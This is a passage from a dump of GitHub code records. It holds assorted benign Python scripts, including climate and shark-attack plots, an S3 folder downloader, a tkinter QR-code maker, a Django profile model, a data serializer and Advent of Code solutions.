bin=alt.BinParams(maxbins=settings[\"maxbins\"]),\n scale=alt.Scale(domain=settings[\"x_domain\"]),\n title=settings[\"x_title\"],\n ),\n y=alt.Y(\"count()\", axis=alt.Axis(title=settings[\"y_title\"])),\n )\n ).properties(\n title=settings[\"title\"], width=settings[\"width\"], height=settings[\"height\"]\n )\n\n return st.altair_chart(plot)\n\n\ndef line_chart_3d(df, settings):\n def value_to_xy(value, month):\n v = value - settings[\"y_domain\"][0]\n origin = (np.abs(settings[\"y_domain\"][0]) + settings[\"y_domain\"][1]) / 2\n theta_radians = 2 * np.pi / 12 * (month - 1)\n x = origin + v * np.cos(theta_radians)\n y = origin + v * np.sin(theta_radians)\n return x, y\n\n rad_max: float = np.abs(settings[\"y_domain\"][0]) + settings[\"y_domain\"][1] + 1\n df[\"x\"] = 0\n df[\"y\"] = 0\n df[\"z\"] = 0\n\n for index, row in df.iterrows():\n x, y = value_to_xy(row[settings[\"value\"]], row[settings[\"month\"]])\n z = row[settings[\"year\"]] + row[settings[\"month\"]] / 12\n df.loc[index, \"x\"] = x\n df.loc[index, \"y\"] = y\n df.loc[index, \"z\"] = z\n\n df[\"text\"] = (\n df[settings[\"year\"]].map(str)\n + \"/\"\n + df[settings[\"month\"]].map(str)\n + \": \"\n + df[settings[\"value\"]].round(1).map(str)\n + \" °C\"\n )\n\n # color schemas: https://plotly.com/python/colorscales/#colorscales-in-dash\n fig = px.scatter_3d(\n df,\n x=\"x\",\n y=\"y\",\n z=\"z\",\n title=settings[\"title\"],\n color=settings[\"value\"],\n color_continuous_scale=\"edge\", # px.colors.sequential.ed\n # this does not work\n hover_data={\n settings[\"year\"]: True,\n settings[\"month\"]: True,\n settings[\"value\"]: \":.1f\",\n \"x\": False,\n \"y\": False,\n \"z\": False,\n },\n )\n fig.update_yaxes(visible=False, showticklabels=False)\n fig.update_xaxes(visible=False, showticklabels=False)\n fig.update_traces(mode=\"markers+lines\")\n\n fig.update_layout(\n width=800,\n height=700,\n autosize=False,\n # title=\"test\",\n scene=dict(\n camera=dict(\n up=dict(x=0, y=0, z=1),\n eye=dict(\n x=0,\n y=1.0707,\n z=1,\n ),\n ),\n aspectratio=dict(x=1, y=1, z=0.7),\n aspectmode=\"manual\",\n ),\n )\n\n st.plotly_chart(fig, width=1000, height=1000)\n","repo_name":"lcalmbach/climate-sci-graph","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":15988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30277021390","text":"#!/usr/bin/env python3\nimport boto3\nimport os\n\ns3 = boto3.client('s3')\n\ndef download_dir(prefix, local, bucket='tori-calculate-wind-power'):\n \"\"\"\n params:\n - prefix: pattern to match in s3\n - local: local path to folder in which to place files\n - bucket: s3 bucket with target contents\n \"\"\"\n keys = []\n dirs = []\n next_token = ''\n base_kwargs = {\n 'Bucket':bucket,\n 'Prefix':prefix,\n }\n while next_token is not None:\n kwargs = base_kwargs.copy()\n if next_token != '':\n kwargs.update({'ContinuationToken': next_token})\n results = s3.list_objects_v2(**kwargs)\n contents = results.get('Contents')\n for i in contents:\n k = i.get('Key')\n if k[-1] != '/':\n keys.append(k)\n else:\n dirs.append(k)\n next_token = results.get('NextContinuationToken')\n for d in dirs:\n dest_pathname = os.path.join(local, d)\n if not os.path.exists(os.path.dirname(dest_pathname)):\n os.makedirs(os.path.dirname(dest_pathname))\n for k in keys:\n dest_pathname = os.path.join(local, k)\n if not os.path.exists(os.path.dirname(dest_pathname)):\n os.makedirs(os.path.dirname(dest_pathname))\n s3.download_file(bucket, k, 
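\n                         # one blocking GET per key; a thread pool (e.g. via\n                         # concurrent.futures, not used in this script) could\n                         # parallelize large prefixes\n                         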
dest_pathname)\n\nif __name__ == '__main__':\n    download_dir('output/', '/home/tori/wind/data')\n","repo_name":"jschmidtnj/tori-wind","sub_path":"analysis/download_output.py","file_name":"download_output.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2797210715","text":"import sys\n# from PyQt6.QtCore import QtCore\n# from PyQt6.QtGui import QtGui\nfrom PyQt6.QtWidgets import QLabel,QPushButton,QApplication,QMainWindow\n \n# let's create a class that inherits from QMainWindow\nclass JanelaPrincipal(QMainWindow):\n    # class constructor\n    def __init__(self):\n        super().__init__()\n        self.setWindowTitle(\"Sistema de LOG\")\n        self.setGeometry(0,0,600,500)\n        \n        # let's create a QPushButton button\n        \n        # we set this button as the central widget\n        # of the main window\n        # self.setCentralWidget(botao)\n        \nif __name__== \"__main__\":\n    # create the application\n    app = QApplication(sys.argv)\n    \n    # create the main window and make it visible\n    janela_principal = JanelaPrincipal()\n    janela_principal.show()\n    \n    # run the application\n    app.exec()","repo_name":"mateussiilva/gerenciador_de_log","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"28863125139","text":"#!/usr/bin/python3\n\n\"\"\"\nTakes in a letter\nSends a post request to http://0.0.0.0:5000/search_user\n\"\"\"\n\nif __name__ == \"__main__\":\n    import requests\n    import sys\n\n    url = \"http://0.0.0.0:5000/search_user\"\n    if len(sys.argv) == 2:\n        q = {'q': sys.argv[1]}\n    else:\n        q = \"\"\n\n    r = requests.post(url, data=q)\n    try:\n        obj = r.json()\n        if not obj:\n            print(\"No result\")\n            exit(1)\n        print(\"[{}] {}\".format(obj[\"id\"], obj[\"name\"]))\n    except Exception:\n        print(\"Not a valid JSON\")\n","repo_name":"rcezea/alx-higher_level_programming","sub_path":"0x11-python-network_1/8-json_api.py","file_name":"8-json_api.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7729215343","text":"def fun():\n    print(\"hello\")\n    print(\"funny\")\n    print(\"man\")\nfun()\nprint(\"how are you\")\nfun()\nprint(\"how are you\")\n\n\ndef great(lang):\n    if lang=='es':\n        print(\"Hola\")\n    elif lang=='fr':\n        print(\"Bonjour\")\n    else:\n        print(\"Hello\")\ngreat('en')\ngreat('es')\ngreat('fr')\n\n\n# RETURN VALUE\n# Often a function will take its arguments,\n# do some computation, and return a value to be\n# used as the function call in the calling expression.\n# The return keyword is used for this.\n\ndef greatest(lang):\n    if lang=='es':\n        return \"Hola\"\n    elif lang=='fr':\n        return \"Bonjour\"\n    else:\n        return \"Hello\"\nprint(greatest('en'),'glenn')\nprint(greatest('es'),'hotel')\nprint(greatest('fr'), 'Michael')\n\n\n\n# MULTIPLE PARAMETERS\n# We can define more than one parameter in the function definition\n# we simply add more arguments when we call the function\n# we match the number and order of arguments and parameters\n\ndef add(a,b):\n    added = a + b\n    return added\n\nx=add(3,6)\nprint(x)","repo_name":"Himangshu1086/TUTORIALS","sub_path":"python/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"38208951672","text":"import qrcode, tkinter as tk\r\nfrom tkinter import 
font\r\n\r\nroot = tk.Tk()\r\nroot.geometry(\"860x560\")\r\nroot.configure(background=\"#00284d\")\r\nroot.resizable(False,False)\r\ntk.Wm.wm_title(root, \"QR Converter\")\r\ntext = tk.StringVar(root)\r\nname = tk.StringVar(root)\r\n\r\ndef convert():\r\n    img = qrcode.make(text.get())\r\n    img.save(name.get()+\".png\")\r\n\r\ndef clean():\r\n    text.set(\"\")\r\n    name.set(\"\")\r\n\r\ntk.Label(\r\n    text=\"Type the text you want to convert to \\nQR Code. You can write anything, \\nincluding URL links.\",\r\n    bg=\"#005cb3\",\r\n    fg=\"White\",\r\n    font=(\"Courier\", 25, \"bold\"),\r\n    border=3,\r\n    relief=\"solid\"\r\n\r\n    ).pack(fill=tk.BOTH)\r\n\r\ntk.Label(\r\n    text=\"TEXT:\",\r\n    bg=\"#005cb3\",\r\n    fg=\"White\",\r\n    font=(\"Courier\", 30, \"bold\"),\r\n    padx=10,\r\n    pady=10,\r\n    border=2,\r\n    relief=\"solid\"\r\n\r\n    ).place(x=20,y=190)\r\n\r\ntk.Label(\r\n    text=\"FILE NAME:\",\r\n    bg=\"#005cb3\",\r\n    fg=\"White\",\r\n    font=(\"Courier\", 30, \"bold\"),\r\n    padx=10,\r\n    pady=10,\r\n    border=2,\r\n    relief=\"solid\"\r\n\r\n    ).place(x=20,y=300)\r\n\r\n\r\ntxt_enter = tk.Entry(\r\n    bg=\"#005cb3\",\r\n    fg=\"White\",\r\n    textvariable=text,\r\n    font=(\"Courier\", 15, \"bold\"),\r\n    width=50,\r\n    border=2,\r\n    relief=\"solid\",\r\n    justify=\"center\"\r\n\r\n).place(x=210,y=190, height=70)\r\n\r\nfilename = tk.Entry(\r\n    bg=\"#005cb3\",\r\n    fg=\"White\",\r\n    textvariable=name,\r\n    font=(\"Courier\", 15, \"bold\"),\r\n    width=40,\r\n    border=2,\r\n    relief=\"solid\",\r\n    justify=\"center\"\r\n\r\n).place(x=330,y=300, height=70)\r\n\r\ntk.Button(\r\n    text=\"CONVERT\",\r\n    bg=\"#005cb3\",\r\n    fg=\"White\",\r\n    font=(\"Courier\", 30, \"bold\"),\r\n    border=5,\r\n    relief=\"raised\",\r\n    justify=\"center\",\r\n    command=convert\r\n\r\n).place(x=590,y=410)\r\n\r\ntk.Button(\r\n    text=\"CLEAN\",\r\n    bg=\"#005cb3\",\r\n    fg=\"White\",\r\n    font=(\"Courier\", 30, \"bold\"),\r\n    border=5,\r\n    relief=\"raised\",\r\n    justify=\"center\",\r\n    command=clean\r\n\r\n).place(x=360,y=410)\r\n\r\ntk.mainloop()\r\n\r\n","repo_name":"Conper/QR-converter","sub_path":"QRCode-Converter-TKINTER.py","file_name":"QRCode-Converter-TKINTER.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27450043896","text":"import json\r\nimport math\r\nimport sys\r\nfrom functools import partial\r\n\r\n# function that checks whether a point belongs to the given quadrant\r\ndef pripada(kvadrant, tacka): # 1, {'teme': 'A', 'koordinate': [10.0, 1.1]}\r\n    koordinate = tacka[\"koordinate\"]\r\n    if kvadrant == 1:\r\n        return koordinate[0] >=0 and koordinate[1] >=0\r\n    elif kvadrant == 2:\r\n        return koordinate[0] <=0 and koordinate[1] >=0\r\n    elif kvadrant == 3:\r\n        return koordinate[0] <=0 and koordinate[1] <=0\r\n    elif kvadrant == 4:\r\n        return koordinate[0] >=0 and koordinate[1] <=0\r\n    else:\r\n        print(\"Error: the quadrant was not entered correctly\")\r\n        exit()\r\n\r\nif len(sys.argv) != 2:\r\n    print(\"Not enough command line arguments given: kvadrant\")\r\n    exit(1)\r\n\t\r\ntry:\r\n\twith open(\"tacke.json\",\"r\") as f: # [{'teme': 'A', 'koordinate': [10.0, 1.1]}, ...]\r\n\t\ttacke = json.load(f)\r\nexcept IOError:\r\n\tprint('Error: open json file')\r\n\texit(1)\r\n\t\r\ntry:\r\n\tkvadrant = int(sys.argv[1])\r\nexcept ValueError:\r\n\tprint('Error: invalid cast')\r\n\texit(1)\r\n\t\r\n# with partial we fix one argument: kvadrant\r\n# partial returns an object that can be called like a function (here, a function of one argument)\r\nuslov = partial(pripada, 
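\r\n                 # a quick sketch of what partial gives us here (pripada_q1 is an\r\n                 # illustrative name, not part of the original script):\r\n                 #   pripada_q1 = partial(pripada, 1)\r\n                 #   pripada_q1({'teme': 'A', 'koordinate': [1.0, 2.0]})  # -> True\r\n                 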
kvadrant)\r\nkvadrant_tacke = list(filter(uslov, tacke)) # we get a plain list from the filter object\r\n\r\n# Output\r\nif len(kvadrant_tacke) > 0:\r\n    print(min(kvadrant_tacke, key = lambda x: x['koordinate'][0]**2 + x['koordinate'][1]**2))\r\nelse:\r\n    print(\"The requested point does not exist\")\r\n\t\r\n# Possible alternative: solving the task by sorting (not efficient)\r\n# sortirane_tacke = sorted(tacke, key = lambda x: x['koordinate'][0]**2 + x['koordinate'][1]**2)\r\n# print(sortirane_tacke)\r\n\r\n\r\n\r\n","repo_name":"matf-pp/PPI-materials","sub_path":"03_python_functional/3_08.py","file_name":"3_08.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"sh","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"5500612215","text":"# coding=utf-8\nimport io\nimport shutil\nimport os\n\n# file writing; with...as is similar to Java 7's try-with-resources\nwith io.open(\"./tmp.txt\", mode='x+') as f:\n    f.writelines(\"hello world1\\n\")\n    f.writelines(\"hello world2\\n\")\n    f.writelines(\"hello world3\\n\")\n\n# file reading\nf = \"\"\ntry:\n    f = io.open(\"./tmp.txt\", mode='r+')\n    for line in f.readlines():\n        print(line)\nfinally:\n    f.close()\n\n# file copy\nshutil.copy('./tmp.txt', './tmp1.txt')\n\n# get file attributes\nprint(\"====== file attributes ======\")\nprint(os.stat(\"./tmp1.txt\"))\nprint(os.getcwd())\n\n# delete the files\nos.remove(\"./tmp.txt\")\nos.remove(\"./tmp1.txt\")\n","repo_name":"penghuiping/python-learn","sub_path":"src/c6_file/FileTest.py","file_name":"FileTest.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34607423651","text":"from django.db import models\nfrom datetime import date\nfrom mancay.models import Book\nfrom django.contrib.auth.models import User\nfrom multiselectfield import MultiSelectField\n\nclass Profile(models.Model):\n    user = models.OneToOneField(User, null=True, on_delete=models.CASCADE)\n    name = models.CharField(max_length=200, null=True)\n    member_since = models.DateField(default=date.today)  # pass the callable so the default is evaluated per row, not once at import\n\n    profile_pic = models.ImageField(null=True, blank=True)\n\n    INTEREST_CHOICES = (\n        ('Fiction', 'Fiction'),\n        ('Non-Fiction', 'Non-Fiction'),\n        ('Historical', 'Historical'),\n        ('Biography', 'Biography'),\n        ('Self-Development', 'Self-Development'),\n        ('Business', 'Business')\n    )\n\n    interest = MultiSelectField(null=True, choices=INTEREST_CHOICES)\n\n\n    def __str__(self):\n        return self.name","repo_name":"finazaria/bookmeplease","sub_path":"fina/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27863260092","text":"grid = [line.strip() for line in open('d21.txt')]\nrocks = {(x, y) for y, line in enumerate(grid) for x, ch in enumerate(line.strip()) if ch == '#'}\nstart = next((x, y) for y, line in enumerate(grid) for x, ch in enumerate(line.strip()) if ch == 'S')\nheight, width = len(grid), len(grid[0])\nsize = height if height == width else None\n\n# Part 1 - BFS for creating distance map on original grid\nfront, steps, distmap = {start}, 0, {start: 0}\nwhile front:\n    steps += 1\n    new_front = set()\n    for x, y in front:\n        for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n            nx, ny = x + dx, y + dy \n            if nx < 0 or nx >= width or ny < 0 or ny >= height: continue\n            if (nx, ny) in rocks or (nx, ny) in distmap: continue\n            distmap[(nx, ny)] = steps\n            new_front.add((nx, ny))\n    front = new_front\nprint(len([pos for pos, step in distmap.items() if step <= 64 and step % 2 
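\n             # parity argument: a plot at BFS distance d is occupied after n steps\n             # iff d <= n and d % 2 == n % 2; with n = 64 (even) we keep even distances\n             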
== 0]))\n\n# Part 2 - geometrical solution true after every 2nd step\nN = 26501365\nn = (N - (size - 1) // 2) // size\ntile_odd = len([pos for pos, step in distmap.items() if step % 2 == 1])\ntile_even = len([pos for pos, step in distmap.items() if step % 2 == 0])\ntriang_odd = len([pos for pos, step in distmap.items() if step > 65 and step % 2 == 1])\ntriang_even = len([pos for pos, step in distmap.items() if step > 65 and step % 2 == 0])\nprint((n + 1)**2 * tile_odd + n**2 * tile_even + n * triang_even - (n + 1) * triang_odd)","repo_name":"olamberti/advent-of-code","sub_path":"2023/d21.py","file_name":"d21.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23115676491","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport os\n\nos.getcwd()\nos.chdir(\"C:/Users/gdcma/Ironhack/Projects/data-cleaning-pandas/\")\n\n# Shark related attacks according to sex\ndef visualSex(path):\n df = pd.read_csv(path)\n # Total attacks in F and M\n sns.set(rc={\"figure.figsize\": (5, 4)}, font_scale=0.75)\n sns.set_style(\"white\")\n plt.figure()\n sex_gral = sns.countplot(x=df[\"Sex\"])\n sex_gral.set(title = \"Total attacks in men and women\")\n sex_gral.bar_label(sex_gral.containers[0])\n sex_gral.figure.savefig(\"images/sex_gral.jpg\", dpi=1000);\n # % attacks in F and M\n plt.figure()\n sex_percentage = df[\"Sex\"].value_counts().plot.pie(autopct=\"%.1f%%\")\n sex_percentage.set(title = \"Percentage of attacks in men and women\")\n sex_percentage.figure.savefig(\"images/sex_percentage.jpg\", dpi=1000);\n # Attacks from 1880 in M and F\n df_history = df[df[\"Year\"] > 1880]\n plt.figure()\n sex_history1880 = sns.histplot(data=df_history, x=\"Year\", hue=\"Sex\", multiple=\"stack\")\n sex_history1880.set(title = \"Attacks in men and women from 1880\")\n sex_history1880.figure.savefig(\"images/sex_history1880.jpg\", dpi=1000)\n # Open images:\n os.startfile(\"images/sex_percentage.jpg\")\n os.startfile(\"images/sex_gral.jpg\")\n os.startfile(\"images/sex_history1880.jpg\")\n\ndef visualHistory(path):\n df = pd.read_csv(path)\n sns.set(rc={\"figure.figsize\": (5, 4)}, font_scale=0.75)\n sns.set_style(\"white\")\n # Attacks throughout history\n plt.figure()\n history = sns.boxplot(x = \"Year\", data = df); # There is not much information about shark attacks previous to 1880\n history.set(title = \"Total attacks throughout time\")\n history.figure.savefig(\"images/history.jpg\", dpi=1000);\n # Attacks from 1880\n df_history = df[df[\"Year\"] > 1880]\n plt.figure()\n history1880 = sns.histplot(data=df_history, x=\"Year\")\n history1880.set(title = \"Total attacks throughout time from 1880\")\n history1880.figure.savefig(\"images/history1880.jpg\", dpi=1000);\n # Deaths from 1880\n plt.figure()\n fatal_history1880 = sns.histplot(data=df_history.loc[df_history[\"Fatal\"] == \"Y\"], x=\"Year\");\n fatal_history1880.figure.savefig(\"images/fatal_history1880.jpg\", dpi=1000)\n # Open images:\n os.startfile(\"images/history.jpg\")\n os.startfile(\"images/history1880.jpg\")\n os.startfile(\"images/fatal_history1880.jpg\")\n\n# Shark related deaths according to sex\ndef visualDeathSex(path):\n df = pd.read_csv(path)\n sns.set(rc={\"figure.figsize\": (5, 4)}, font_scale=0.75)\n sns.set_style(\"white\")\n # Percentage of attacks that are deadly\n plt.figure()\n deaths = df[\"Fatal\"].value_counts().plot.pie(autopct=\"%.1f%%\");\n deaths.set(title = \"Percentage of fatal 
events\")\n deaths.figure.savefig(\"images/deaths.jpg\", dpi=1000);\n # Percentage of attacks that are deadly depending on sex\n df_F = df[df[\"Sex\"] == \"F\"]\n df_M = df[df[\"Sex\"] == \"M\"]\n plt.figure()\n fatal_Fem = df_F[\"Fatal\"].value_counts().plot.pie(autopct=\"%.1f%%\");\n fatal_Fem.set(title = \"Percentage of deadly attacks in women\")\n fatal_Fem.figure.savefig(\"images/fatal_Fem.jpg\", dpi=1000)\n plt.figure()\n fatal_Men = df_M[\"Fatal\"].value_counts().plot.pie(autopct=\"%.1f%%\");\n fatal_Men.set(title = \"Percentage of deadly attacks in men\")\n fatal_Men.figure.savefig(\"images/fatal_Men.jpg\", dpi=1000)\n # Apparently, men die more from shark attacks than women after suffering an attack\n # Deaths from 1880 in M and F\n df_history = df[df[\"Year\"] > 1880]\n plt.figure()\n fatal_Sexhistory1880 = sns.histplot(data=df_history.loc[df_history[\"Fatal\"] == \"Y\"], x=\"Year\", hue=\"Sex\", multiple=\"stack\");\n fatal_Sexhistory1880.set(title = \"Deaths in men and women throughout time\")\n fatal_Sexhistory1880.figure.savefig(\"images/fatal_Sexhistory1880.jpg\", dpi=1000)\n # Open images:\n os.startfile(\"images/fatal_Fem.jpg\")\n os.startfile(\"images/fatal_Men.jpg\")\n os.startfile(\"images/fatal_Sexhistory1880.jpg\")\n\n# Shark related child deaths according to sex throughout history\ndef kids(path):\n df = pd.read_csv(path)\n sns.set(rc={\"figure.figsize\": (5, 4)}, font_scale=0.75)\n sns.set_style(\"white\")\n mask_kids = pd.DataFrame(df.loc[(df[\"Age\"] < 13)])\n mask_kidsfatal = pd.DataFrame(df.loc[(df[\"Age\"] < 13) & (df[\"Fatal\"] == \"Y\")])\n # Attacks to kids throughout history\n plt.figure()\n kid_attacks = sns.histplot(data=mask_kids, x=\"Year\");\n kid_attacks.set(title = \"Attacks suffered by children throughout time\")\n kid_attacks.figure.savefig(\"images/kid_attacks.jpg\", dpi=1000)\n # Attacks to kids throughout history according to sex\n plt.figure()\n sexkid_attacks = sns.histplot(data=mask_kids, x=\"Year\", hue=\"Sex\", multiple=\"stack\");\n sexkid_attacks.set(title = \"Attacks suffered by boys and girls throughout time\") \n sexkid_attacks.figure.savefig(\"images/sexkid_attacks.jpg\", dpi=1000)\n # Deaths of kids throughout history\n plt.figure()\n kid_deaths = sns.histplot(data=mask_kidsfatal, x=\"Year\");\n kid_deaths.set(title = \"Deaths of children throughout time\") \n kid_deaths.figure.savefig(\"images/kid_deaths.jpg\", dpi=1000)\n # Deaths of kids throughout history according to sex\n plt.figure()\n sexkid_deaths = sns.histplot(data=mask_kidsfatal, x=\"Year\", hue=\"Sex\", multiple=\"stack\");\n sexkid_deaths.set(title = \"Deaths of boys and girls throughout time\")\n sexkid_deaths.figure.savefig(\"images/sexkid_deaths.jpg\", dpi=1000)\n #Age of the deaths throughout history\n plt.figure()\n agekid_deaths = sns.lineplot(data=mask_kidsfatal, x=\"Year\", y=\"Age\");\n agekid_deaths.set(title = \"Age of deaths of children throughout time\")\n agekid_deaths.figure.savefig(\"images/agekid_deaths.jpg\", dpi=1000)\n plt.figure()\n scatteredagekid_deaths = sns.scatterplot(data=mask_kidsfatal, x=\"Year\", y =\"Age\"); #Not clear, recategorise the Age\n scatteredagekid_deaths.figure.savefig(\"images/scatteredagekid_deaths.jpg\", dpi=1000)\n # Recateg age of kids\n mask_toddler = (mask_kids[\"Age\"] < 3)\n mask_preschool = (mask_kids[\"Age\"] >= 3) & (mask_kids[\"Age\"] < 6)\n mask_school = (mask_kids[\"Age\"] >= 6) & (mask_kids[\"Age\"] < 12)\n mask_kids.loc[mask_toddler, \"Age_categ\"] = \"Toddler\"\n mask_kids.loc[mask_preschool, \"Age_categ\"] = 
\"Preschooler\"\n mask_kids.loc[mask_school, \"Age_categ\"] = \"School-aged\"\n mask_fataltoddler = (mask_kidsfatal[\"Age\"] < 3)\n mask_fatalpreschool = (mask_kidsfatal[\"Age\"] >= 3) & (mask_kidsfatal[\"Age\"] < 6)\n mask_fatalschool = (mask_kidsfatal[\"Age\"] >= 6) & (mask_kidsfatal[\"Age\"] < 12)\n mask_kidsfatal.loc[mask_fataltoddler, \"Age_categ\"] = \"Toddler\"\n mask_kidsfatal.loc[mask_fatalpreschool, \"Age_categ\"] = \"Preschooler\"\n mask_kidsfatal.loc[mask_fatalschool, \"Age_categ\"] = \"School-aged\"\n # Category of age of the attacks throughout history\n plt.figure()\n agekid_attacks = sns.histplot(data=mask_kids, x=\"Year\", hue = \"Age_categ\", multiple=\"stack\");\n agekid_attacks.set(title = \"Attacks by age category of children throughout time\")\n agekid_attacks.figure.savefig(\"images/agekid_attacks.jpg\", dpi=1000)\n # Category of age of the deaths throughout history\n plt.figure()\n agecategkid_deaths = sns.histplot(data=mask_kidsfatal, x=\"Year\", hue = \"Age_categ\", multiple=\"stack\");\n agecategkid_deaths.figure.savefig(\"images/agecategkid_deaths.jpg\", dpi=1000)\n # Open images:\n os.startfile(\"images/kid_attacks.jpg\")\n os.startfile(\"images/sexkid_attacks.jpg\")\n os.startfile(\"images/kid_deaths.jpg\")\n os.startfile(\"images/sexkid_deaths.jpg\")\n os.startfile(\"images/agekid_deaths.jpg\")\n os.startfile(\"images/scatteredagekid_deaths.jpg\")\n os.startfile(\"images/agekid_attacks.jpg\")\n os.startfile(\"images/agecategkid_deaths.jpg\")\n\n# Shark's favourite food\ndef lunch(path):\n df = pd.read_csv(path)\n sns.set(rc={\"figure.figsize\": (5, 4)}, font_scale=0.75)\n sns.set_style(\"white\")\n # Moment of day sharks attack the most\n plt.figure()\n lunch = df[\"Moment\"].value_counts().plot.pie(autopct=\"%.1f%%\"); # NaN: 1918; and not NaN: 2895\n lunch.set(title = \"Percentage of attacks by moment of day\");\n lunch.figure.savefig(\"images/lunch.jpg\", dpi=1000)\n # Moment of day sharks attack the most according to sex\n plt.figure()\n sex_lunch = sns.countplot(x=df[\"Moment\"], hue=df[\"Sex\"], palette=\"magma\");\n sex_lunch.set(title = \"Moment of day sharks attack the most according to sex\");\n sex_lunch.figure.savefig(\"images/sex_lunch.jpg\", dpi=1000)\n # Open images:\n os.startfile(\"images/lunch.jpg\")\n os.startfile(\"images/sex_lunch.jpg\")","repo_name":"MartaGDC/data-cleaning-pandas","sub_path":"src/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":8645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37688896783","text":"class InvalidDataError(Exception):\n ...\n\nclass ContentSerializer:\n required_keys = {\n \"title\": str, \n \"module\": str, \n \"description\": str, \n \"students\": int, \n \"is_active\": bool\n }\n\n\n def __init__(self, *args, **kwargs):\n self.data = kwargs\n self.errors = {}\n\n\n def data_validation(self):\n self.ignore_extra_keys()\n\n try:\n self.validate_required_keys()\n self.expected_types()\n return True\n except InvalidDataError:\n return False\n \n\n def ignore_extra_keys(self):\n data_keys = set(self.data.keys())\n\n for key in data_keys:\n if key not in self.required_keys.keys():\n self.data.pop(key)\n \n def validate_required_keys(self):\n for key in self.required_keys.keys():\n if key not in self.data.keys():\n self.errors[key] = \"missing key\"\n\n if self.errors:\n raise InvalidDataError\n\n def expected_types(self):\n for key, value_type in self.required_keys.items():\n if type(self.data[key]) is not 
value_type:\n self.errors[key] = f'must be a {value_type.__name__}'\n\n if self.errors:\n raise InvalidDataError\n","repo_name":"letlm/kontent-python","sub_path":"content/content_serializer.py","file_name":"content_serializer.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73447881700","text":"from csv import DictReader\nfrom typing import NamedTuple\nimport os\nimport os.path\n\ndef csvrows(path: str):\n with open(path, encoding='utf-8-sig') as csvreader:\n reader = DictReader(csvreader)\n for row in reader:\n yield row\n\n\nclass OccupationDescription(NamedTuple):\n code: int\n title: str\n description: str\n\nclass CoreCompetency(NamedTuple):\n name: str\n score: int\n\nOCCUPATION_DESCRIPTIONS: dict[int, OccupationDescription] = dict()\nOCCUPATION_CORE_COMPETENCIES: dict[int, list[CoreCompetency]] = dict()\nOCCUPATION_TECHNOLOGY_TOOLS: dict[int, list[str]] = dict()\nTITLE_TO_CODE: dict[str, int] = dict()\n\nSPECIALIST_TASKS: dict[int, dict[str, dict[str, list[str]]]] = dict()\n\nfor r in csvrows('data/occupation_descriptions.csv'):\n o = OccupationDescription(int(r['ANZSCO_Code']), r['ANZSCO_Title'], r['ANZSCO_Desc'])\n OCCUPATION_DESCRIPTIONS[o.code] = o\n TITLE_TO_CODE[o.title] = o.code\n\nfor r in csvrows('data/core_competencies.csv'):\n code = int(r['ANZSCO_Code'])\n\n if code not in OCCUPATION_CORE_COMPETENCIES:\n OCCUPATION_CORE_COMPETENCIES[code] = []\n\n OCCUPATION_CORE_COMPETENCIES[code].append(\n CoreCompetency(r['Core_Competencies'], int(r['Score'])))\n\nfor r in csvrows('data/technology_tools.csv'):\n code = int(r['ANZSCO_Code'])\n if code not in OCCUPATION_TECHNOLOGY_TOOLS:\n OCCUPATION_TECHNOLOGY_TOOLS[code] = []\n OCCUPATION_TECHNOLOGY_TOOLS[code].append(r['Technology_tool'])\n\nfor r in csvrows('data/specialist_tasks.csv'):\n code = int(r['ANZSCO_Code'])\n if code not in SPECIALIST_TASKS:\n SPECIALIST_TASKS[code] = dict()\n\n cluster_family = r['Cluster_Family']\n if cluster_family not in SPECIALIST_TASKS[code]:\n SPECIALIST_TASKS[code][cluster_family] = dict()\n\n specialist_cluster = r['Specialist_Cluster']\n if specialist_cluster not in SPECIALIST_TASKS[code][cluster_family]:\n SPECIALIST_TASKS[code][cluster_family][specialist_cluster] = []\n\n specialist_task = r['Specialist_Task']\n SPECIALIST_TASKS[code][cluster_family][specialist_cluster].append(specialist_task)\n","repo_name":"fryeb/jobs_data","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4851730499","text":"import aoc_utils\nlines = aoc_utils.readlines()\nfor x in lines:\n print(x)\naim = 'a'\nsoldict = {}\nfor x in lines:\n solution = ''\n i = 0\n while True:\n if x[i] == '-':\n break\n solution += x[i]\n i+=1\n soldict[x.split()[-1]] = solution\nsolution = soldict[aim]\nprint(solution)\nprint(soldict[\"lx\"])\nwhile any(substring in solution for substring in soldict):\n x = solution.split()\n for i in range(len(x)):\n if x[i] in soldict:\n x[i] = \"(\"+soldict[x[i]]+\")\"\n solution = \"\"\n for word in x:\n solution += \" \"\n solution += word\n print(solution)\n 